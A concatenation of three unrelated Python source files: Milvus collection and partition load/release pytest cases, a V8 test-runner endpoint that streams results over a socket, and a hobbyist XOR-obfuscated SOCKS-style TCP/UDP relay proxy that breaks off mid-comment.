connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
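# create_target_index is assumed to normalize the expected index dict (e.g. attaching the field name) so it can be compared directly with the describe_index result.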
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.load_collection(collection)
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: not determined yet
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
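# searching the released partition is expected to fail, while the still-loaded default partition keeps serving results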
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into a partition, load the partition, then release the collection
expected: search raises exception after the collection is released
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: search raises exception after the collection is released
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
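# _async=True is assumed to return a search future immediately, so release_collection below can race with the in-flight search.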
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: search raises exception after the partition is released
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
res = connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: search raises exception after the collection is released
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected: search raises exception after the collection is released
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected: search result is empty after the partition is released
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected: search raises exception after the collection is released
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_dropping_index(self, connect, collection):
"""
target: test release collection during dropping index
method: insert, create index and flush, load collection, do release collection during dropping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_partitions` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.release_partitions(collection, [partition_name])
|
endpoint.py
|
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os
import Queue
import threading
import time
from ..local import execution
from ..local import progress
from ..local import testsuite
from ..local import utils
from ..server import compression
class EndpointProgress(progress.ProgressIndicator):
def __init__(self, sock, server, ctx):
super(EndpointProgress, self).__init__()
self.sock = sock
self.server = server
self.context = ctx
self.results_queue = [] # Accessors must synchronize themselves.
self.sender_lock = threading.Lock()
self.senderthread = threading.Thread(target=self._SenderThread)
self.senderthread.start()
def HasRun(self, test, has_unexpected_output):
# The runners that call this have a lock anyway, so this is safe.
self.results_queue.append(test)
def _SenderThread(self):
keep_running = True
tests = []
self.sender_lock.acquire()
while keep_running:
time.sleep(0.1)
# This should be "atomic enough" without locking :-)
# (We don't care which list any new elements get appended to, as long
# as we don't lose any and the last one comes last.)
current = self.results_queue
self.results_queue = []
for c in current:
if c is None:
keep_running = False
else:
tests.append(c)
if keep_running and len(tests) < 1:
continue # Wait for more results.
if len(tests) < 1: break # We're done here.
result = []
for t in tests:
result.append(t.PackResult())
try:
compression.Send(result, self.sock)
except:
self.runner.terminate = True
for t in tests:
self.server.CompareOwnPerf(t, self.context.arch, self.context.mode)
tests = []
self.sender_lock.release()
def Execute(workspace, ctx, tests, sock, server):
suite_paths = utils.GetSuitePaths(os.path.join(workspace, "test"))
suites = []
for root in suite_paths:
suite = testsuite.TestSuite.LoadTestSuite(
os.path.join(workspace, "test", root))
if suite:
suite.SetupWorkingDirectory()
suites.append(suite)
suites_dict = {}
for s in suites:
suites_dict[s.name] = s
s.tests = []
for t in tests:
suite = suites_dict[t.suite]
t.suite = suite
suite.tests.append(t)
suites = [ s for s in suites if len(s.tests) > 0 ]
for s in suites:
s.DownloadData()
progress_indicator = EndpointProgress(sock, server, ctx)
runner = execution.Runner(suites, progress_indicator, ctx)
try:
runner.Run(server.jobs)
except IOError, e:
if e.errno == 2:
message = ("File not found: %s, maybe you forgot to 'git add' it?" %
e.filename)
else:
message = "%s" % e
compression.Send([[-1, message]], sock)
progress_indicator.HasRun(None, None) # Sentinel to signal the end.
progress_indicator.sender_lock.acquire() # Released when sending is done.
progress_indicator.sender_lock.release()
|
sock4.py
|
import socket
import select
import socketserver
import logging
import json
#import http
from multiprocessing import Process
with open('config.json', 'rb') as f:
config = json.load(f)
#port = int(config['loaclport'])
serverdd = config['server']
port = int(config['port'])
pss = config['password']
key1 = int.from_bytes(pss[1].encode(),byteorder='big')
class UDPSocks5Server(socketserver.BaseRequestHandler):
def handle(self):
cop,sockd = self.request
#print(cop)
#UDPsocked = sockd
ccc = self.client_address
date=xorr(cop)
if(int(date[0])==1):
# forward in (inbound relay)
oopd = int(date[1])
if(int(date[2:2+oopd]==pss.encode())):
nowdate = date[oopd+2:]
server11 = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
remote_port = int.from_bytes(nowdate[0:2], 'big')
datein = nowdate[2:]
#if datein == b'\x01\x02\x03\x04':
#print('ip information')
#sockd.sendto(b'\x03\x01',ccc)
#server11.sendto(len(ccc[0]).to_bytes(1, byteorder = 'big')+bytes(ccc[0],encoding = "utf8")+ccc[1].to_bytes(2, byteorder = 'big'),(('0.0.0.0'),remote_port))
#else:
#print('send-OK')
#print(datein)
#print(remote_port)
#server11.sendto(,(('0.0.0.0'),remote_port))
server11.bind(('127.0.0.1',0))
server11.sendto(server11.getsockname()[1].to_bytes(length=2,byteorder='big')+len(ccc[0]).to_bytes(1, byteorder = 'big')+bytes(ccc[0],encoding = "utf8")+ccc[1].to_bytes(2, byteorder = 'big')+datein,(('127.0.0.1'),remote_port))
#datey,user = server11.recvfrom(1024*100)
#sockd.sendto(datey,ccc)
server11.close()
#sockd.close()
if(int(date[0])==2):
#print('OK')
#print(date)
# forward out (outbound relay)
#print(date)
lena=date[1]
#print(lena)
ipld=date[2:2+lena]
#print(ipld)
portld=date[2+lena]*256+date[3+lena]
#print(portld)
date=date[4+lena:]
#print(date)
date=xorr(date)
sockd.sendto(date,(ipld,portld))
#remote_ip=socket.inet_ntoa(date[1:5])
#remote_ip=socket.inet_ntoa(nowdate[0:4])
#remote_port=int.from_bytes(nowdate[4:6], 'big')
#print(remote_ip)
#print(remote_port)
#sendpp=nowdate[6:]
#print(sendpp)
#server11 = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#server11.sendto(sendpp,(remote_ip,remote_port))
#reply = b'\x00\x00\x00\x01'
#data_s,server_addr1 = server11.recvfrom(1024*100)
#reply+=nowdate[0:6]+data_s
#cop = xorr(reply)
#sockd.sendto(cop,ccc)
#server11.close()
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Socks5Server(socketserver.StreamRequestHandler):
def handle_tcp(self, client, remote):
try:
fds = [client,remote]
while True:
r,w,e = select.select(fds,[],[],5)
if client in r:
cli_data = client.recv(128)
#cli_data_de = cli_data
cli_data_de = xorr(cli_data)
if len(cli_data) <= 0:
break
result = send_all(remote, cli_data_de)
if result < len(cli_data):
logging.warning("Failed piping all data to target!!!")
break
if remote in r:
remote_data = remote.recv(128)
#remote_data_en = remote_data
remote_data_en = xorr(remote_data)
if len(remote_data) <= 0:
break
result = send_all(client, remote_data_en)
if result < len(remote_data):
logging("Failed pipping all data to client!!!")
break
except Exception as e:
logging.error(e)
finally:
client.close()
remote.close()
def handle(self):
client = self.request
data=client.recv(1024)
#client.send(b'\x05\x00')
#client.recv(1000)
#client.send(b"\x05\x00\x00\x03" + socket.inet_aton("0.0.0.0") + (port).to_bytes(2, byteorder = 'big'))
if data[0] == 1:
print ("TCP methon")
if (data[2:2 + data[1]]) == pss.encode():
print ("Password is right")
remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print(data[2 + data[1]:3 + data[1]])
if data[2 + data[1]:3 + data[1]] == b'\x01' :
print("domain method")
yumingcode=data[4 + data[1]:4 + data[1] + data[data[1]+3]]
print(yumingcode)
#yuming=decode1(yumingcode,1)
yuming=xorr(yumingcode)
print(yuming)
tempip = socket.getaddrinfo(yuming, None)
remoteport = ord(data[4 + data[1] + data[data[1]+3]:5 + data[1] + data[data[1]+3]])*256+ord(data[5 + data[1] + data[data[1]+3]:6 + data[1] + data[data[1]+3]])
print(remoteport)
remoteip=tempip[-1][4][0]
print(remoteip)
else:
tempip = data[3 + data[1]:7 + data[1]]
remoteip= str(tempip[0]) +'\x2e'+ str(tempip[1]) +'\x2e'+ str(tempip[2]) + '\x2e'+ str(tempip[3])
remoteport = ord(data[7 + data[1]:8 + data[1]])*256+ord(data[8 + data[1]:9 + data[1]])
print(remoteip)
print(remoteport)
#print (remoteip[0][4][0])
#sock.send('\x03\x00')
remote.connect((remoteip, remoteport))
client.send(b'\x03\x00')
self.handle_tcp(client,remote)
if data[0] == 2:
print ("UDP methon")#BAND-
if (data[2:2 + data[1]]) == pss.encode():
print ("Password is right")
#ooo=data[2+data[1]:]
sockudp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sockudp.bind(('0.0.0.0',0))
remoteudp = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
client.send(sockudp.getsockname()[1].to_bytes(length=2,byteorder='big'))  # send the bound UDP port back to the client
print('Bind in %d'% sockudp.getsockname()[1] )
#test= sockudp.recvfrom(1024*100)
#test=test[0]
#test1=test[0]
#backclient=test[1:test1+1]
#backclient=backclient.decode()
#backport=int.from_bytes(test[test1+1:], 'big')
#print(int.from_bytes(sockudp.recvfrom(1), 'big'))
#backclient=sockudp.revfrom(int.from_bytes(sockudp.recvfrom(1), 'big'))
#backport=sockudp.recvfrom(2)
#print(backclient)
#print(backport)
#print(sockudp.recvfrom(1).to_bytes(length=2,byteorder='big'))
#sockudp.recvfrom()
#backclient=sockudp.recvfrom(sockudp.recvfrom(1))
#backport=sockudp.recvfrom(2)
print("UDP-Hand-OK")
#sockudp.sendto(b'\x03\x01',(backclient,backport) )
try:
fds = [sockudp,remoteudp,client]
print(fds)
while True:
r,w,e = select.select(fds,[],[],1)
#print(r)
#print(w)
#print(e)
#if len(client.recv(1024))==0:
#print('Tcp-Udp End')
#break
for i in r:
if i is client:
#print('client disconnect')
if len(client.recv(1024))==0:
print('Tcp-Udp End')
remoteudp.close()
sockudp.close()
client.close()
break
if i is sockudp:
print('client->server->web')
jibadate,cccs = sockudp.recvfrom(1024)
print(jibadate)
#copo=jibadate[0]*256+jibadate[1]
cogpo = int.from_bytes(jibadate[0:2], 'big')
print(cogpo)
testdata = jibadate[2:]
print(testdata)
#lenddd = jibadate[0]
lenddd=testdata[0]
print(lenddd)
ipoposad=testdata[1:1+lenddd]
print(ipoposad)
portoposad=testdata[1+lenddd]*256+testdata[2+lenddd]
print(portoposad)
testdata=testdata[3+lenddd:]
#print(testdata)
#lenddd=testdata[0]
#sockdpp=testdata[1:1+lenddd]
#testdata=testdata[3+lenddd:]
#print(testdata)
#testdata = sockudp.recvfrom(1024 * 100)
udpdatein = testdata
udpdatein = udpdatein[4:]
ipgg=str(udpdatein[0]) +'\x2e'+ str(udpdatein[1]) +'\x2e'+ str(udpdatein[2]) + '\x2e'+ str(udpdatein[3])
print(ipgg)
portgg=udpdatein[4]*256+udpdatein[5]
print(portgg)
udpdatein=udpdatein[6:]
remoteudp.sendto(udpdatein,(ipgg,portgg))
#testdata = remoteudp.recvfrom(1024 * 100)
#udpdateout = testdata[0]
#lpo=testdata[1]
#udpdateout = b'\x00\x00\x00\x01'+socket.inet_aton(lpo[0])+lpo[1].to_bytes(length=2,byteorder='big',signed=False)+udpdateout
#coop= xorr(udpdateout)
#sockudp.sendto(coop,('127.0.0.1',cogpo))
#sockudp.sendto(coop,(backclient,backport))
if i is remoteudp:
print('web->server->client')
udpdateout,lpo = remoteudp.recvfrom(1024)
udpdateout = b'\x00\x00\x00\x01'+socket.inet_aton(lpo[0])+lpo[1].to_bytes(length=2,byteorder='big',signed=False)+udpdateout
udpdateout = b'\x02'+len(ipoposad).to_bytes(1, byteorder = 'big')+ipoposad+portoposad.to_bytes(2, byteorder = 'big')+udpdateout
coop= xorr(udpdateout)
sockudp.sendto(coop,('127.0.0.1',port))
#UDPsocked.sendto()
except Exception as e:
logging.error(e)
finally:
print('UDP Close Successfully')
client.close()
remoteudp.close()
sockudp.close()
#client.close()
#sockudp.close()
#remoteudp.close()
#ttt=xorr(ooo[1:])
#if ooo[0]==1:
#print('IP')
#tempip=ttt[0:4]
#remoteip= str(tempip[0]) +'\x2e'+ str(tempip[1]) +'\x2e'+ str(tempip[2]) + '\x2e'+ str(tempip[3])
#remoteport = ttt[4]*256 + ttt[5]
#mesg=ttt[6:]
#if ooo[0]==3:
#print('domain')
#len=ttt[0]
#yumingcode=data[1:2+len]
#ver,methods = client.recv(1),client.recv(1)
#methods = client.recv(ord(methods))
#client.send(b'\x05\x00')
#ver,cmd,rsv,atype = client.recv(1),client.recv(1),client.recv(1),client.recv(1)
#if ord(cmd) is not 1:
#client.close()
#return
# check whether the address type (atype) is supported; IPv6 is currently not supported
# convert the byte stream into an integer; 'big' means big-endian encoding
#if ord(atype) == 1:
# IPv4
#remote_addr = socket.inet_ntoa(client.recv(4))
#remote_port = int.from_bytes(client.recv(2), 'big')
#elif ord(atype) == 3:
# domain name
#addr_len = int.from_bytes(client.recv(1), byteorder = 'big')
#remote_addr = client.recv(addr_len)
#remote_port = int.from_bytes(client.recv(2), byteorder = 'big')
#else:
# unsupported address type: close the connection
#client.close()
#return
#remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#logging.info('[+] %s:%dConnect to --> %s:%d' % (self.client_address[0], self.client_address[1], remote_addr, remote_port))
#remote.connect((remote_addr, remote_port))
#reply = b"\x05\x00\x00\x01" + socket.inet_aton("0.0.0.0") + (2222).to_bytes(2, byteorder = 'big')
#client.send(reply)
def encode1(data,m):
q=""
for i in data:
tt=i^9
q=q+ chr( tt + 4 )
#q=q+chr(i^9)
j=q.encode()
if( m == 1 ):
return q
else:
return j
def decode1(data,m):
q = ""
for i in data:
tt = i -4
q=q+ chr( tt ^ 9)
#q=q+chr(i^9)
j=q.encode()
if( m == 1 ):
return q
else:
return j
def send_all(sock, data):
bytes_sent = 0
while True:
r = sock.send(data[bytes_sent:])
if r < 0:
return r
bytes_sent += r
if bytes_sent == len(data):
return bytes_sent
def xorr(data):
ddd=b''
for i in data:
ddd+= (i^key1).to_bytes(length=1,byteorder='big')
return ddd
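# A quick sanity sketch (defined but not called anywhere): xorr() is a
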